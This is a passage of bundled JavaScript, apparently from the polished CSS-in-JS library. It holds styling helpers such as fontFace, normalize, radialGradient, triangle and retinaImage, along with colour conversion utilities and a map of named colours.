      mediaQueries["@media (min-width: " + minScreen + ")"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, mediaQueries["@media (min-width: " + minScreen + ")"], (_extends2 = {}, _extends2[obj.prop] = between(obj.fromSize, obj.toSize, minScreen, maxScreen), _extends2));
      mediaQueries["@media (min-width: " + maxScreen + ")"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, mediaQueries["@media (min-width: " + maxScreen + ")"], (_extends3 = {}, _extends3[obj.prop] = obj.toSize, _extends3));
    }

    return Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, fallbacks, mediaQueries);
  } else {
    var _ref2, _ref3, _ref4;

    if (!cssProp.prop || !cssProp.fromSize || !cssProp.toSize) {
      throw new Error('expects the first argument object to have the properties `prop`, `fromSize`, and `toSize`.');
    }

    return _ref4 = {}, _ref4[cssProp.prop] = cssProp.fromSize, _ref4["@media (min-width: " + minScreen + ")"] = (_ref2 = {}, _ref2[cssProp.prop] = between(cssProp.fromSize, cssProp.toSize, minScreen, maxScreen), _ref2), _ref4["@media (min-width: " + maxScreen + ")"] = (_ref3 = {}, _ref3[cssProp.prop] = cssProp.toSize, _ref3), _ref4;
  }
}

function generateFileReferences(fontFilePath, fileFormats) {
  var fileFontReferences = fileFormats.map(function (format) {
    return "url(\"" + fontFilePath + "." + format + "\")";
  });
  return fileFontReferences.join(', ');
}

function generateLocalReferences(localFonts) {
  var localFontReferences = localFonts.map(function (font) {
    return "local(\"" + font + "\")";
  });
  return localFontReferences.join(', ');
}

function generateSources(fontFilePath, localFonts, fileFormats) {
  var fontReferences = [];
  if (localFonts) fontReferences.push(generateLocalReferences(localFonts));

  if (fontFilePath) {
    fontReferences.push(generateFileReferences(fontFilePath, fileFormats));
  }

  return fontReferences.join(', ');
}
/**
 * CSS for a @font-face declaration.
 *
 * @example
 * // Styles as object basic usage
 * const styles = {
 *    ...fontFace({
 *      'fontFamily': 'Sans-Pro',
 *      'fontFilePath': 'path/to/file'
 *    })
 * }
 *
 * // styled-components basic usage
 * const GlobalStyle = createGlobalStyle`${
 *   fontFace({
 *     'fontFamily': 'Sans-Pro',
 *     'fontFilePath': 'path/to/file'
 *   }
 * )}`
 *
 * // CSS as JS Output
 *
 * '@font-face': {
 *   'fontFamily': 'Sans-Pro',
 *   'src': 'url("path/to/file.eot"), url("path/to/file.woff2"), url("path/to/file.woff"), url("path/to/file.ttf"), url("path/to/file.svg")',
 * }
 */


function fontFace(_ref) {
  var fontFamily = _ref.fontFamily,
      fontFilePath = _ref.fontFilePath,
      fontStretch = _ref.fontStretch,
      fontStyle = _ref.fontStyle,
      fontVariant = _ref.fontVariant,
      fontWeight = _ref.fontWeight,
      _ref$fileFormats = _ref.fileFormats,
      fileFormats = _ref$fileFormats === void 0 ? ['eot', 'woff2', 'woff', 'ttf', 'svg'] : _ref$fileFormats,
      localFonts = _ref.localFonts,
      unicodeRange = _ref.unicodeRange,
      fontDisplay = _ref.fontDisplay,
      fontVariationSettings = _ref.fontVariationSettings,
      fontFeatureSettings = _ref.fontFeatureSettings;
  // Error Handling
  if (!fontFamily) throw new Error('fontFace expects a name of a font-family.');

  if (!fontFilePath && !localFonts) {
    throw new Error('fontFace expects either the path to the font file(s) or a name of a local copy.');
  }

  if (localFonts && !Array.isArray(localFonts)) {
    throw new Error('fontFace expects localFonts to be an array.');
  }

  if (!Array.isArray(fileFormats)) {
    throw new Error('fontFace expects fileFormats to be an array.');
  }

  var fontFaceDeclaration = {
    '@font-face': {
      fontFamily: fontFamily,
      src: generateSources(fontFilePath, localFonts, fileFormats),
      unicodeRange: unicodeRange,
      fontStretch: fontStretch,
      fontStyle: fontStyle,
      fontVariant: fontVariant,
      fontWeight: fontWeight,
      fontDisplay: fontDisplay,
      fontVariationSettings: fontVariationSettings,
      fontFeatureSettings: fontFeatureSettings
    } // Removes undefined fields for cleaner css object.

  };
  return JSON.parse(JSON.stringify(fontFaceDeclaration));
}

/**
 * CSS to hide text to show a background image in a SEO-friendly way.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   'backgroundImage': 'url(logo.png)',
 *   ...hideText(),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   backgroundImage: url(logo.png);
 *   ${hideText()};
 * `
 *
 * // CSS as JS Output
 *
 * 'div': {
 *   'backgroundImage': 'url(logo.png)',
 *   'textIndent': '101%',
 *   'overflow': 'hidden',
 *   'whiteSpace': 'nowrap',
 * }
 */
function hideText() {
  return {
    textIndent: '101%',
    overflow: 'hidden',
    whiteSpace: 'nowrap'
  };
}

/**
 * CSS to hide content visually but remain accessible to screen readers.
 * from [HTML5 Boilerplate](https://github.com/h5bp/html5-boilerplate/blob/9a176f57af1cfe8ec70300da4621fb9b07e5fa31/src/css/main.css#L121)
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...hideVisually(),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${hideVisually()};
 * `
 *
 * // CSS as JS Output
 *
 * 'div': {
 *   'border': '0',
 *   'clip': 'rect(0 0 0 0)',
 *   'clipPath': 'inset(50%)',
 *   'height': '1px',
 *   'margin': '-1px',
 *   'overflow': 'hidden',
 *   'padding': '0',
 *   'position': 'absolute',
 *   'whiteSpace': 'nowrap',
 *   'width': '1px',
 * }
 */
function hideVisually() {
  return {
    border: '0',
    clip: 'rect(0 0 0 0)',
    clipPath: 'inset(50%)',
    height: '1px',
    margin: '-1px',
    overflow: 'hidden',
    padding: '0',
    position: 'absolute',
    whiteSpace: 'nowrap',
    width: '1px'
  };
}

/**
 * Generates a media query to target HiDPI devices.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *  [hiDPI(1.5)]: {
 *    width: 200px;
 *  }
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${hiDPI(1.5)} {
 *     width: 200px;
 *   }
 * `
 *
 * // CSS as JS Output
 *
 * '@media only screen and (-webkit-min-device-pixel-ratio: 1.5),
 *  only screen and (min--moz-device-pixel-ratio: 1.5),
 *  only screen and (-o-min-device-pixel-ratio: 1.5/1),
 *  only screen and (min-resolution: 144dpi),
 *  only screen and (min-resolution: 1.5dppx)': {
 *   'width': '200px',
 * }
 */
function hiDPI(ratio) {
  if (ratio === void 0) {
    ratio = 1.3;
  }

  return "\n    @media only screen and (-webkit-min-device-pixel-ratio: " + ratio + "),\n    only screen and (min--moz-device-pixel-ratio: " + ratio + "),\n    only screen and (-o-min-device-pixel-ratio: " + ratio + "/1),\n    only screen and (min-resolution: " + Math.round(ratio * 96) + "dpi),\n    only screen and (min-resolution: " + ratio + "dppx)\n  ";
}

/**
 * CSS to normalize abnormalities across browsers (normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css)
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *    ...normalize(),
 * }
 *
 * // styled-components usage
 * const GlobalStyle = createGlobalStyle`${normalize()}`
 *
 * // CSS as JS Output
 *
 * html {
 *   lineHeight: 1.15,
 *   textSizeAdjust: 100%,
 * } ...
 */
function normalize() {
  var _ref;

  return [(_ref = {
    html: {
      lineHeight: '1.15',
      textSizeAdjust: '100%'
    },
    body: {
      margin: '0'
    },
    h1: {
      fontSize: '2em',
      margin: '0.67em 0'
    },
    hr: {
      boxSizing: 'content-box',
      height: '0',
      overflow: 'visible'
    },
    pre: {
      fontFamily: 'monospace, monospace',
      fontSize: '1em'
    },
    a: {
      backgroundColor: 'transparent'
    },
    'abbr[title]': {
      borderBottom: 'none',
      textDecoration: 'underline'
    }
  }, _ref["b,\n    strong"] = {
    fontWeight: 'bolder'
  }, _ref["code,\n    kbd,\n    samp"] = {
    fontFamily: 'monospace, monospace',
    fontSize: '1em'
  }, _ref.small = {
    fontSize: '80%'
  }, _ref["sub,\n    sup"] = {
    fontSize: '75%',
    lineHeight: '0',
    position: 'relative',
    verticalAlign: 'baseline'
  }, _ref.sub = {
    bottom: '-0.25em'
  }, _ref.sup = {
    top: '-0.5em'
  }, _ref.img = {
    borderStyle: 'none'
  }, _ref["button,\n    input,\n    optgroup,\n    select,\n    textarea"] = {
    fontFamily: 'inherit',
    fontSize: '100%',
    lineHeight: '1.15',
    margin: '0'
  }, _ref["button,\n    input"] = {
    overflow: 'visible'
  }, _ref["button,\n    select"] = {
    textTransform: 'none'
  }, _ref["button,\n    html [type=\"button\"],\n    [type=\"reset\"],\n    [type=\"submit\"]"] = {
    WebkitAppearance: 'button'
  }, _ref["button::-moz-focus-inner,\n    [type=\"button\"]::-moz-focus-inner,\n    [type=\"reset\"]::-moz-focus-inner,\n    [type=\"submit\"]::-moz-focus-inner"] = {
    borderStyle: 'none',
    padding: '0'
  }, _ref["button:-moz-focusring,\n    [type=\"button\"]:-moz-focusring,\n    [type=\"reset\"]:-moz-focusring,\n    [type=\"submit\"]:-moz-focusring"] = {
    outline: '1px dotted ButtonText'
  }, _ref.fieldset = {
    padding: '0.35em 0.625em 0.75em'
  }, _ref.legend = {
    boxSizing: 'border-box',
    color: 'inherit',
    display: 'table',
    maxWidth: '100%',
    padding: '0',
    whiteSpace: 'normal'
  }, _ref.progress = {
    verticalAlign: 'baseline'
  }, _ref.textarea = {
    overflow: 'auto'
  }, _ref["[type=\"checkbox\"],\n    [type=\"radio\"]"] = {
    boxSizing: 'border-box',
    padding: '0'
  }, _ref["[type=\"number\"]::-webkit-inner-spin-button,\n    [type=\"number\"]::-webkit-outer-spin-button"] = {
    height: 'auto'
  }, _ref['[type="search"]'] = {
    WebkitAppearance: 'textfield',
    outlineOffset: '-2px'
  }, _ref['[type="search"]::-webkit-search-decoration'] = {
    WebkitAppearance: 'none'
  }, _ref['::-webkit-file-upload-button'] = {
    WebkitAppearance: 'button',
    font: 'inherit'
  }, _ref.details = {
    display: 'block'
  }, _ref.summary = {
    display: 'list-item'
  }, _ref.template = {
    display: 'none'
  }, _ref['[hidden]'] = {
    display: 'none'
  }, _ref), {
    'abbr[title]': {
      textDecoration: 'underline dotted'
    }
  }];
}

/**
 * CSS to style the placeholder pseudo-element.
 *
 * @deprecated - placeholder has been marked for deprecation in polished 2.0 and will be fully deprecated in 3.0. It is no longer needed and can safely be replaced with the non-prefixed placeholder pseudo-element.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...placeholder({'color': 'blue'})
 * }
 *
 * // styled-components usage
 * const div = styled.input`
 *    ${placeholder({'color': 'blue'})}
 * `
 *
 * // CSS as JS Output
 *
 * 'input': {
 *   '&:-moz-placeholder': {
 *     'color': 'blue',
 *   },
 *   '&:-ms-input-placeholder': {
 *     'color': 'blue',
 *   },
 *   '&::-moz-placeholder': {
 *     'color': 'blue',
 *   },
 *   '&::-webkit-input-placeholder': {
 *     'color': 'blue',
 *   },
 * },
 */
function placeholder(styles, parent) {
  var _ref;

  if (parent === void 0) {
    parent = '&';
  }

  return _ref = {}, _ref[parent + "::-webkit-input-placeholder"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, styles), _ref[parent + ":-moz-placeholder"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, styles), _ref[parent + "::-moz-placeholder"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, styles), _ref[parent + ":-ms-input-placeholder"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, styles), _ref;
}

function _templateObject() {
  var data = Object(__WEBPACK_IMPORTED_MODULE_1__babel_runtime_helpers_esm_taggedTemplateLiteralLoose__["a" /* default */])(["radial-gradient(", "", "", "", ")"]);

  _templateObject = function _templateObject() {
    return data;
  };

  return data;
}

function parseFallback(colorStops) {
  return colorStops[0].split(' ')[0];
}

function constructGradientValue(literals) {
  var template = '';

  for (var i = 0; i < literals.length; i += 1) {
    template += literals[i]; // Adds leading coma if properties preceed color-stops

    if (i === 3 && (i + 1 < 1 || arguments.length <= i + 1 ? undefined : arguments[i + 1]) && ((arguments.length <= 1 ? undefined : arguments[1]) || (arguments.length <= 2 ? undefined : arguments[2]) || (arguments.length <= 3 ? undefined : arguments[3]))) {
      template = template.slice(0, -1);
      template += ", " + (i + 1 < 1 || arguments.length <= i + 1 ? undefined : arguments[i + 1]); // No trailing space if color-stops is the only param provided
    } else if (i === 3 && (i + 1 < 1 || arguments.length <= i + 1 ? undefined : arguments[i + 1]) && !(arguments.length <= 1 ? undefined : arguments[1]) && !(arguments.length <= 2 ? undefined : arguments[2]) && !(arguments.length <= 3 ? undefined : arguments[3])) {
      template += "" + (i + 1 < 1 || arguments.length <= i + 1 ? undefined : arguments[i + 1]); // Only adds substitution if it is defined
    } else if (i + 1 < 1 || arguments.length <= i + 1 ? undefined : arguments[i + 1]) {
      template += (i + 1 < 1 || arguments.length <= i + 1 ? undefined : arguments[i + 1]) + " ";
    }
  }

  return template.trim();
}
/**
 * CSS for declaring a radial gradient, including a fallback background-color. The fallback is either the first color-stop or an explicitly passed fallback color.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...radialGradient({
 *     colorStops: ['#00FFFF 0%', 'rgba(0, 0, 255, 0) 50%', '#0000FF 95%'],
 *     extent: 'farthest-corner at 45px 45px',
 *     position: 'center',
 *     shape: 'ellipse',
 *   })
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${radialGradient({
 *     colorStops: ['#00FFFF 0%', 'rgba(0, 0, 255, 0) 50%', '#0000FF 95%'],
 *     extent: 'farthest-corner at 45px 45px',
 *     position: 'center',
 *     shape: 'ellipse',
 *   })}
 *`
 *
 * // CSS as JS Output
 *
 * div: {
 *   'backgroundColor': '#00FFFF',
 *   'backgroundImage': 'radial-gradient(center ellipse farthest-corner at 45px 45px, #00FFFF 0%, rgba(0, 0, 255, 0) 50%, #0000FF 95%)',
 * }
 */


function radialGradient(_ref) {
  var colorStops = _ref.colorStops,
      extent = _ref.extent,
      fallback = _ref.fallback,
      position = _ref.position,
      shape = _ref.shape;

  if (!colorStops || colorStops.length < 2) {
    throw new Error('radialGradient requries at least 2 color-stops to properly render.');
  }

  return {
    backgroundColor: fallback || parseFallback(colorStops),
    backgroundImage: constructGradientValue(_templateObject(), position, shape, extent, colorStops.join(', '))
  };
}

/**
 * A helper to generate a retina background image and non-retina
 * background image. The retina background image will output to a HiDPI media query. The mixin uses
 * a _2x.png filename suffix by default.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *  ...retinaImage('my-img')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${retinaImage('my-img')}
 * `
 *
 * // CSS as JS Output
 * div {
 *   backgroundImage: 'url(my-img.png)',
 *   '@media only screen and (-webkit-min-device-pixel-ratio: 1.3),
 *    only screen and (min--moz-device-pixel-ratio: 1.3),
 *    only screen and (-o-min-device-pixel-ratio: 1.3/1),
 *    only screen and (min-resolution: 144dpi),
 *    only screen and (min-resolution: 1.5dppx)': {
 *     backgroundImage: 'url(my-img_2x.png)',
 *   }
 * }
 */
function retinaImage(filename, backgroundSize, extension, retinaFilename, retinaSuffix) {
  var _ref;

  if (extension === void 0) {
    extension = 'png';
  }

  if (retinaSuffix === void 0) {
    retinaSuffix = '_2x';
  }

  if (!filename) {
    throw new Error('Please supply a filename to retinaImage() as the first argument.');
  } // Replace the dot at the beginning of the passed extension if one exists


  var ext = extension.replace(/^\./, '');
  var rFilename = retinaFilename ? retinaFilename + "." + ext : "" + filename + retinaSuffix + "." + ext;
  return _ref = {
    backgroundImage: "url(" + filename + "." + ext + ")"
  }, _ref[hiDPI()] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({
    backgroundImage: "url(" + rFilename + ")"
  }, backgroundSize ? {
    backgroundSize: backgroundSize
  } : {}), _ref;
}

/**
 * CSS to style the selection pseudo-element.
 *
 * @deprecated - selection has been marked for deprecation in polished 2.0 and will be fully deprecated in 3.0. It is no longer needed and can safely be replaced with the non-prefixed selection pseudo-element.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...selection({
 *     'backgroundColor': 'blue'
 *   }, 'section')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${selection({'backgroundColor': 'blue'}, 'section')}
 * `
 *
 * // CSS as JS Output
 *
 * 'div': {
 *   'section::-moz-selection': {
 *     'backgroundColor':'blue',
 *   },
 *   'section::selection': {
 *     'backgroundColor': 'blue',
 *   }
 * }
 */
function selection(styles, parent) {
  var _ref;

  if (parent === void 0) {
    parent = '';
  }

  return _ref = {}, _ref[parent + "::-moz-selection"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, styles), _ref[parent + "::selection"] = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, styles), _ref;
}

/* eslint-disable key-spacing */
var functionsMap = {
  easeInBack: 'cubic-bezier(0.600, -0.280, 0.735, 0.045)',
  easeInCirc: 'cubic-bezier(0.600,  0.040, 0.980, 0.335)',
  easeInCubic: 'cubic-bezier(0.550,  0.055, 0.675, 0.190)',
  easeInExpo: 'cubic-bezier(0.950,  0.050, 0.795, 0.035)',
  easeInQuad: 'cubic-bezier(0.550,  0.085, 0.680, 0.530)',
  easeInQuart: 'cubic-bezier(0.895,  0.030, 0.685, 0.220)',
  easeInQuint: 'cubic-bezier(0.755,  0.050, 0.855, 0.060)',
  easeInSine: 'cubic-bezier(0.470,  0.000, 0.745, 0.715)',
  easeOutBack: 'cubic-bezier(0.175,  0.885, 0.320, 1.275)',
  easeOutCubic: 'cubic-bezier(0.215,  0.610, 0.355, 1.000)',
  easeOutCirc: 'cubic-bezier(0.075,  0.820, 0.165, 1.000)',
  easeOutExpo: 'cubic-bezier(0.190,  1.000, 0.220, 1.000)',
  easeOutQuad: 'cubic-bezier(0.250,  0.460, 0.450, 0.940)',
  easeOutQuart: 'cubic-bezier(0.165,  0.840, 0.440, 1.000)',
  easeOutQuint: 'cubic-bezier(0.230,  1.000, 0.320, 1.000)',
  easeOutSine: 'cubic-bezier(0.390,  0.575, 0.565, 1.000)',
  easeInOutBack: 'cubic-bezier(0.680, -0.550, 0.265, 1.550)',
  easeInOutCirc: 'cubic-bezier(0.785,  0.135, 0.150, 0.860)',
  easeInOutCubic: 'cubic-bezier(0.645,  0.045, 0.355, 1.000)',
  easeInOutExpo: 'cubic-bezier(1.000,  0.000, 0.000, 1.000)',
  easeInOutQuad: 'cubic-bezier(0.455,  0.030, 0.515, 0.955)',
  easeInOutQuart: 'cubic-bezier(0.770,  0.000, 0.175, 1.000)',
  easeInOutQuint: 'cubic-bezier(0.860,  0.000, 0.070, 1.000)',
  easeInOutSine: 'cubic-bezier(0.445,  0.050, 0.550, 0.950)'
  /* eslint-enable key-spacing */

};

function getTimingFunction(functionName) {
  return functionsMap[functionName];
}
/**
 * String to represent common easing functions as demonstrated here: (github.com/jaukia/easie).
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   'transitionTimingFunction': timingFunctions('easeInQuad')
 * }
 *
 * // styled-components usage
 *  const div = styled.div`
 *   transitionTimingFunction: ${timingFunctions('easeInQuad')};
 * `
 *
 * // CSS as JS Output
 *
 * 'div': {
 *   'transitionTimingFunction': 'cubic-bezier(0.550,  0.085, 0.680, 0.530)',
 * }
 */


function timingFunctions(timingFunction) {
  return getTimingFunction(timingFunction);
}

/**
 * Shorthand that accepts up to four values, including null to skip a value, and maps them to their respective directions.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...borderColor('red', 'green', 'blue', 'yellow')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${borderColor('red', 'green', 'blue', 'yellow')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'borderTopColor': 'red',
 *   'borderRightColor': 'green',
 *   'borderBottomColor': 'blue',
 *   'borderLeftColor': 'yellow'
 * }
 */
function borderColor() {
  for (var _len = arguments.length, values = new Array(_len), _key = 0; _key < _len; _key++) {
    values[_key] = arguments[_key];
  }

  return directionalProperty.apply(void 0, ['borderColor'].concat(values));
}

var getBorderWidth = function getBorderWidth(pointingDirection, height, width) {
  switch (pointingDirection) {
    case 'top':
      return "0 " + width[0] / 2 + width[1] + " " + height[0] + height[1] + " " + width[0] / 2 + width[1];

    case 'left':
      return "" + height[0] / 2 + height[1] + " " + width[0] + width[1] + " " + height[0] / 2 + height[1] + " 0";

    case 'bottom':
      return "" + height[0] + height[1] + " " + width[0] / 2 + width[1] + " 0 " + width[0] / 2 + width[1];

    case 'right':
      return "" + height[0] / 2 + height[1] + " 0 " + height[0] / 2 + height[1] + " " + width[0] + width[1];

    default:
      throw new Error("Passed invalid argument to triangle, please pass correct pointingDirection e.g. 'right'.");
  }
}; // needed for border-color


var reverseDirection = ['bottom', 'left', 'top', 'right'];
var NUMBER_AND_FLOAT = /(\d*\.?\d*)/;
/**
 * CSS to represent triangle with any pointing direction with an optional background color. Accepts number or px values for height and width.
 *
 * @example
 * // Styles as object usage
 *
 * const styles = {
 *   ...triangle({ pointingDirection: 'right', width: '100px', height: '100px', foregroundColor: 'red' })
 * }
 *
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${triangle({ pointingDirection: 'right', width: '100px', height: '100px', foregroundColor: 'red' })}
 *
 *
 * // CSS as JS Output
 *
 * div: {
 *  'borderColor': 'transparent',
 *  'borderLeftColor': 'red !important',
 *  'borderStyle': 'solid',
 *  'borderWidth': '50px 0 50px 100px',
 *  'height': '0',
 *  'width': '0',
 * }
 */

function triangle(_ref) {
  var pointingDirection = _ref.pointingDirection,
      height = _ref.height,
      width = _ref.width,
      foregroundColor = _ref.foregroundColor,
      _ref$backgroundColor = _ref.backgroundColor,
      backgroundColor = _ref$backgroundColor === void 0 ? 'transparent' : _ref$backgroundColor;
  var widthAndUnit = [parseFloat(width), String(width).replace(NUMBER_AND_FLOAT, '') || 'px'];
  var heightAndUnit = [parseFloat(height), String(height).replace(NUMBER_AND_FLOAT, '') || 'px'];

  if (isNaN(heightAndUnit[0]) || isNaN(widthAndUnit[0])) {
    throw new Error('Passed an invalid value to `height` or `width`. Please provide a pixel based unit');
  }

  var reverseDirectionIndex = reverseDirection.indexOf(pointingDirection);
  return Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({
    width: '0',
    height: '0',
    borderWidth: getBorderWidth(pointingDirection, heightAndUnit, widthAndUnit),
    borderStyle: 'solid'
  }, borderColor.apply(void 0, Array.from({
    length: 4
  }).map(function (_, index) {
    return index === reverseDirectionIndex ? foregroundColor : backgroundColor;
  })));
}

/**
 * Provides an easy way to change the `wordWrap` property.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...wordWrap('break-word')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${wordWrap('break-word')}
 * `
 *
 * // CSS as JS Output
 *
 * const styles = {
 *   overflowWrap: 'break-word',
 *   wordWrap: 'break-word',
 *   wordBreak: 'break-all',
 * }
 */
function wordWrap(wrap) {
  if (wrap === void 0) {
    wrap = 'break-word';
  }

  var wordBreak = wrap === 'break-word' ? 'break-all' : wrap;
  return {
    overflowWrap: wrap,
    wordWrap: wrap,
    wordBreak: wordBreak
  };
}

function colorToInt(color) {
  return Math.round(color * 255);
}

function convertToInt(red, green, blue) {
  return colorToInt(red) + "," + colorToInt(green) + "," + colorToInt(blue);
}

function hslToRgb(hue, saturation, lightness, convert) {
  if (convert === void 0) {
    convert = convertToInt;
  }

  if (saturation === 0) {
    // achromatic
    return convert(lightness, lightness, lightness);
  } // formular from https://en.wikipedia.org/wiki/HSL_and_HSV


  var huePrime = hue % 360 / 60;
  var chroma = (1 - Math.abs(2 * lightness - 1)) * saturation;
  var secondComponent = chroma * (1 - Math.abs(huePrime % 2 - 1));
  var red = 0;
  var green = 0;
  var blue = 0;

  if (huePrime >= 0 && huePrime < 1) {
    red = chroma;
    green = secondComponent;
  } else if (huePrime >= 1 && huePrime < 2) {
    red = secondComponent;
    green = chroma;
  } else if (huePrime >= 2 && huePrime < 3) {
    green = chroma;
    blue = secondComponent;
  } else if (huePrime >= 3 && huePrime < 4) {
    green = secondComponent;
    blue = chroma;
  } else if (huePrime >= 4 && huePrime < 5) {
    red = secondComponent;
    blue = chroma;
  } else if (huePrime >= 5 && huePrime < 6) {
    red = chroma;
    blue = secondComponent;
  }

  var lightnessModification = lightness - chroma / 2;
  var finalRed = red + lightnessModification;
  var finalGreen = green + lightnessModification;
  var finalBlue = blue + lightnessModification;
  return convert(finalRed, finalGreen, finalBlue);
}

var namedColorMap = {
  aliceblue: 'f0f8ff',
  antiquewhite: 'faebd7',
  aqua: '00ffff',
  aquamarine: '7fffd4',
  azure: 'f0ffff',
  beige: 'f5f5dc',
  bisque: 'ffe4c4',
  black: '000',
  blanchedalmond: 'ffebcd',
  blue: '0000ff',
  blueviolet: '8a2be2',
  brown: 'a52a2a',
  burlywood: 'deb887',
  cadetblue: '5f9ea0',
  chartreuse: '7fff00',
  chocolate: 'd2691e',
  coral: 'ff7f50',
  cornflowerblue: '6495ed',
  cornsilk: 'fff8dc',
  crimson: 'dc143c',
  cyan: '00ffff',
  darkblue: '00008b',
  darkcyan: '008b8b',
  darkgoldenrod: 'b8860b',
  darkgray: 'a9a9a9',
  darkgreen: '006400',
  darkgrey: 'a9a9a9',
  darkkhaki: 'bdb76b',
  darkmagenta: '8b008b',
  darkolivegreen: '556b2f',
  darkorange: 'ff8c00',
  darkorchid: '9932cc',
  darkred: '8b0000',
  darksalmon: 'e9967a',
  darkseagreen: '8fbc8f',
  darkslateblue: '483d8b',
  darkslategray: '2f4f4f',
  darkslategrey: '2f4f4f',
  darkturquoise: '00ced1',
  darkviolet: '9400d3',
  deeppink: 'ff1493',
  deepskyblue: '00bfff',
  dimgray: '696969',
  dimgrey: '696969',
  dodgerblue: '1e90ff',
  firebrick: 'b22222',
  floralwhite: 'fffaf0',
  forestgreen: '228b22',
  fuchsia: 'ff00ff',
  gainsboro: 'dcdcdc',
  ghostwhite: 'f8f8ff',
  gold: 'ffd700',
  goldenrod: 'daa520',
  gray: '808080',
  green: '008000',
  greenyellow: 'adff2f',
  grey: '808080',
  honeydew: 'f0fff0',
  hotpink: 'ff69b4',
  indianred: 'cd5c5c',
  indigo: '4b0082',
  ivory: 'fffff0',
  khaki: 'f0e68c',
  lavender: 'e6e6fa',
  lavenderblush: 'fff0f5',
  lawngreen: '7cfc00',
  lemonchiffon: 'fffacd',
  lightblue: 'add8e6',
  lightcoral: 'f08080',
  lightcyan: 'e0ffff',
  lightgoldenrodyellow: 'fafad2',
  lightgray: 'd3d3d3',
  lightgreen: '90ee90',
  lightgrey: 'd3d3d3',
  lightpink: 'ffb6c1',
  lightsalmon: 'ffa07a',
  lightseagreen: '20b2aa',
  lightskyblue: '87cefa',
  lightslategray: '789',
  lightslategrey: '789',
  lightsteelblue: 'b0c4de',
  lightyellow: 'ffffe0',
  lime: '0f0',
  limegreen: '32cd32',
  linen: 'faf0e6',
  magenta: 'f0f',
  maroon: '800000',
  mediumaquamarine: '66cdaa',
  mediumblue: '0000cd',
  mediumorchid: 'ba55d3',
  mediumpurple: '9370db',
  mediumseagreen: '3cb371',
  mediumslateblue: '7b68ee',
  mediumspringgreen: '00fa9a',
  mediumturquoise: '48d1cc',
  mediumvioletred: 'c71585',
  midnightblue: '191970',
  mintcream: 'f5fffa',
  mistyrose: 'ffe4e1',
  moccasin: 'ffe4b5',
  navajowhite: 'ffdead',
  navy: '000080',
  oldlace: 'fdf5e6',
  olive: '808000',
  olivedrab: '6b8e23',
  orange: 'ffa500',
  orangered: 'ff4500',
  orchid: 'da70d6',
  palegoldenrod: 'eee8aa',
  palegreen: '98fb98',
  paleturquoise: 'afeeee',
  palevioletred: 'db7093',
  papayawhip: 'ffefd5',
  peachpuff: 'ffdab9',
  peru: 'cd853f',
  pink: 'ffc0cb',
  plum: 'dda0dd',
  powderblue: 'b0e0e6',
  purple: '800080',
  rebeccapurple: '639',
  red: 'f00',
  rosybrown: 'bc8f8f',
  royalblue: '4169e1',
  saddlebrown: '8b4513',
  salmon: 'fa8072',
  sandybrown: 'f4a460',
  seagreen: '2e8b57',
  seashell: 'fff5ee',
  sienna: 'a0522d',
  silver: 'c0c0c0',
  skyblue: '87ceeb',
  slateblue: '6a5acd',
  slategray: '708090',
  slategrey: '708090',
  snow: 'fffafa',
  springgreen: '00ff7f',
  steelblue: '4682b4',
  tan: 'd2b48c',
  teal: '008080',
  thistle: 'd8bfd8',
  tomato: 'ff6347',
  turquoise: '40e0d0',
  violet: 'ee82ee',
  wheat: 'f5deb3',
  white: 'fff',
  whitesmoke: 'f5f5f5',
  yellow: 'ff0',
  yellowgreen: '9acd32'
  /**
   * Checks if a string is a CSS named color and returns its equivalent hex value, otherwise returns the original color.
   * @private
   */

};

function nameToHex(color) {
  if (typeof color !== 'string') return color;
  var normalizedColorName = color.toLowerCase();
  return namedColorMap[normalizedColorName] ? "#" + namedColorMap[normalizedColorName] : color;
}

var hexRegex = /^#[a-fA-F0-9]{6}$/;
var hexRgbaRegex = /^#[a-fA-F0-9]{8}$/;
var reducedHexRegex = /^#[a-fA-F0-9]{3}$/;
var reducedRgbaHexRegex = /^#[a-fA-F0-9]{4}$/;
var rgbRegex = /^rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)$/;
